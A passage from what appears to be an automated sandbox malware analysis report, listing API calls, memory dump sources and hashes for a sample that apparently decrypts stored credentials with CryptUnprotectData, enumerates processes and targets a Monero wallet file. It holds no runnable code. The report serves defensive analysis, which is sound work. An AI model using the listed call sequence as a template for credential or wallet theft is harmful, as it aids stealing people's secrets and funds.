                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: >2x.$BA}$Fd1$Q:=k$d_}
                  • API String ID: 0-456034590
                  • Opcode ID: 1bea64c7b3492bfd65397a3ab01618cdbeed31bfef8ec5d9fbe06d43732ea9c6
                  • Instruction ID: a7d28e491b4677335d97985e01620d43ebc4392a8bd5e7d1f7dc5870f68f8397
                  • Opcode Fuzzy Hash: 1bea64c7b3492bfd65397a3ab01618cdbeed31bfef8ec5d9fbe06d43732ea9c6
                  • Instruction Fuzzy Hash: 28B227F36082049FE3046E2DEC8577AFBE9EF94720F1A4A3DE6C4C7744E63598058696
                  APIs
                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00C0C871
                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00C0C87C
                  • lstrcat.KERNEL32(?,00C20B46), ref: 00C0C943
                  • lstrcat.KERNEL32(?,00C20B47), ref: 00C0C957
                  • lstrcat.KERNEL32(?,00C20B4E), ref: 00C0C978
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$BinaryCryptStringlstrlen
                  • String ID:
                  • API String ID: 189259977-0
                  • Opcode ID: 92500f207fcf3c396125db418d17130fe3055c495fa9301e7edad6a5a8843224
                  • Instruction ID: cf6d817a982392f16ddb17e15db665fc1918ed3529d407eb73280c5be0510119
                  • Opcode Fuzzy Hash: 92500f207fcf3c396125db418d17130fe3055c495fa9301e7edad6a5a8843224
                  • Instruction Fuzzy Hash: 43416EB9944219DFDB10CFA0DC89BFEB7B8AB48304F1442B8E509A6280D7745B85CF92
                  APIs
                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00C0724D
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C07254
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00C07281
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00C072A4
                  • LocalFree.KERNEL32(?), ref: 00C072AE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                  • String ID:
                  • API String ID: 2609814428-0
                  • Opcode ID: a61b5796d861feb0c0e78f2f45ad6d823536093d606199dd7f5b914dd0f79400
                  • Instruction ID: e773d07a11496bbfe0d19bc987aee2a762bd7fcd10b8945c2f8289fd841f21c6
                  • Opcode Fuzzy Hash: a61b5796d861feb0c0e78f2f45ad6d823536093d606199dd7f5b914dd0f79400
                  • Instruction Fuzzy Hash: 21014CB5A80208BFEB14DFD4DD4AF9E77B8EB48B00F104155FB05BA2C0C6B0BA058B65
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C1961E
                  • Process32First.KERNEL32(00C20ACA,00000128), ref: 00C19632
                  • Process32Next.KERNEL32(00C20ACA,00000128), ref: 00C19647
                  • StrCmpCA.SHLWAPI(?,00000000), ref: 00C1965C
                  • CloseHandle.KERNEL32(00C20ACA), ref: 00C1967A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                  • String ID:
                  • API String ID: 420147892-0
                  • Opcode ID: 47efde2b105272bd9701dcb058f02f06efb09c47942a99791e4c57d4ec1dfbe2
                  • Instruction ID: ac91cbc05b3dbb938bf0d58d06ab06cfa210f2815dc3f5aab757eefc010df064
                  • Opcode Fuzzy Hash: 47efde2b105272bd9701dcb058f02f06efb09c47942a99791e4c57d4ec1dfbe2
                  • Instruction Fuzzy Hash: DD014CB9A40208AFCB24DFA6CC58BEDB7F8EB09310F004198B909A6240D7349B85DF61
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00C205B7), ref: 00C186CA
                  • Process32First.KERNEL32(?,00000128), ref: 00C186DE
                  • Process32Next.KERNEL32(?,00000128), ref: 00C186F3
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                  • CloseHandle.KERNEL32(?), ref: 00C18761
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                  • String ID:
                  • API String ID: 1066202413-0
                  • Opcode ID: 3b6aec90458e40eb4557acfc97c204de0bfaa733b60ee976ca4181b162f6f429
                  • Instruction ID: 1a5211f5073f3cd037f096620e1c3f7d949c23db59255d8db7140b9847eda108
                  • Opcode Fuzzy Hash: 3b6aec90458e40eb4557acfc97c204de0bfaa733b60ee976ca4181b162f6f429
                  • Instruction Fuzzy Hash: E2316F71902218ABDB24DF51DC45FEEB778EB46710F1041A9F10AA2190DB306B8ADFA1
                  APIs
                  • CryptBinaryToStringA.CRYPT32(00000000,00C05184,40000001,00000000,00000000,?,00C05184), ref: 00C18EC0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptString
                  • String ID:
                  • API String ID: 80407269-0
                  • Opcode ID: a174aca861ba678df22841f722bf13a12102d09178bf0e7f839a770c6b421037
                  • Instruction ID: 596f51cbb83eaa97b283029b955f4bf82a3a20bbdf1ffafc21cc63b2ce944f6c
                  • Opcode Fuzzy Hash: a174aca861ba678df22841f722bf13a12102d09178bf0e7f839a770c6b421037
                  • Instruction Fuzzy Hash: E5112E74204204FFDB04CFA5D884FA733AAEF8A310F149458F9198B250DB35ED8AEB60
                  APIs
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C04EEE,00000000,00000000), ref: 00C09AEF
                  • LocalAlloc.KERNEL32(00000040,?,?,?,00C04EEE,00000000,?), ref: 00C09B01
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C04EEE,00000000,00000000), ref: 00C09B2A
                  • LocalFree.KERNEL32(?,?,?,?,00C04EEE,00000000,?), ref: 00C09B3F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptLocalString$AllocFree
                  • String ID:
                  • API String ID: 4291131564-0
                  • Opcode ID: 025d860b5bc57b05bcbb27c4c8ab3288e05f3f3215a0648338b07b409c206815
                  • Instruction ID: 6305fd76d97f6ca2b3a41560bfa6c2549f0738fc0a887f2e9811da6dfde3d701
                  • Opcode Fuzzy Hash: 025d860b5bc57b05bcbb27c4c8ab3288e05f3f3215a0648338b07b409c206815
                  • Instruction Fuzzy Hash: 9F11A4B4240208AFEB14CF64DC95FAA77B5FB89714F208058F9159B3D0C776AA01CB50
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00C20E00,00000000,?), ref: 00C179B0
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C179B7
                  • GetLocalTime.KERNEL32(?,?,?,?,?,00C20E00,00000000,?), ref: 00C179C4
                  • wsprintfA.USER32 ref: 00C179F3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                  • String ID:
                  • API String ID: 377395780-0
                  • Opcode ID: 01eb09d46fd38195af334777ec6b76400d76394de0fa4ff7b3a80678ff779040
                  • Instruction ID: 65d78f5e179d9d77037f05be7dd1a904d52f81fe804dd710d2b0b179c505727c
                  • Opcode Fuzzy Hash: 01eb09d46fd38195af334777ec6b76400d76394de0fa4ff7b3a80678ff779040
                  • Instruction Fuzzy Hash: BC115AB2944118ABCB14DFCADD44BBEB7F8FB4DB21F04425AF601A2280D2385945D7B1
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0179E5A0,00000000,?,00C20E10,00000000,?,00000000,00000000), ref: 00C17A63
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C17A6A
                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0179E5A0,00000000,?,00C20E10,00000000,?,00000000,00000000,?), ref: 00C17A7D
                  • wsprintfA.USER32 ref: 00C17AB7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                  • String ID:
                  • API String ID: 3317088062-0
                  • Opcode ID: 61239965a644753de57936ef884cc266facbd9dc3465618a8ffbb87d4c9ae2dd
                  • Instruction ID: 15372d05f1b89b53f0c9fa75e9ca775c0cafb5ac59cd8cf34d335da45669a772
                  • Opcode Fuzzy Hash: 61239965a644753de57936ef884cc266facbd9dc3465618a8ffbb87d4c9ae2dd
                  • Instruction Fuzzy Hash: 861182B1945228DFEB148F55DC49F99B778FB05721F1043A6E516A32C0C7741A84DF51
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: )P+~$:>Go$v7
                  • API String ID: 0-253929147
                  • Opcode ID: bd4b9bc3a0621b8f51dc131d69011f16a920965228dae0118b3031ea7eee1b8d
                  • Instruction ID: 9cbb521d6fa5ae00023f92f3cfb101c14b770f1992536d462cebb89b0d51346f
                  • Opcode Fuzzy Hash: bd4b9bc3a0621b8f51dc131d69011f16a920965228dae0118b3031ea7eee1b8d
                  • Instruction Fuzzy Hash: 61B218F36082049FE304AE2DDC8567AF7EAEFD4720F1A893DE6C4C3744EA3558158696
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: G?c$pkk$||_
                  • API String ID: 0-1975962775
                  • Opcode ID: f98047a55da8120b510b2255aa96262ec891e6749b8da4496ad656567bcce468
                  • Instruction ID: 448872c1f66f90a006419182471e9254d3856c86c3e3c794ddab412a92577d15
                  • Opcode Fuzzy Hash: f98047a55da8120b510b2255aa96262ec891e6749b8da4496ad656567bcce468
                  • Instruction Fuzzy Hash: D3B219F3A0C2049FD3046E2DEC8567AFBE9EF94720F1A493DEAC487744EA3558058697
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: BU7k$5o$j
                  • API String ID: 0-1684384253
                  • Opcode ID: 93c9c9c16c874f71f7cf47c6829123484fbabdca728abf732dec77e62b68144d
                  • Instruction ID: 3fa7c914ea66d7836e471005f8c5b2852498469ad1a9c51feab0165c5dbccb76
                  • Opcode Fuzzy Hash: 93c9c9c16c874f71f7cf47c6829123484fbabdca728abf732dec77e62b68144d
                  • Instruction Fuzzy Hash: CBA2C2F3A0C200AFE7046E29EC8567AFBE5EF94720F1A493DEAC487744E63558448797
                  APIs
                  • CoCreateInstance.COMBASE(00C1E118,00000000,00000001,00C1E108,00000000), ref: 00C13758
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00C137B0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
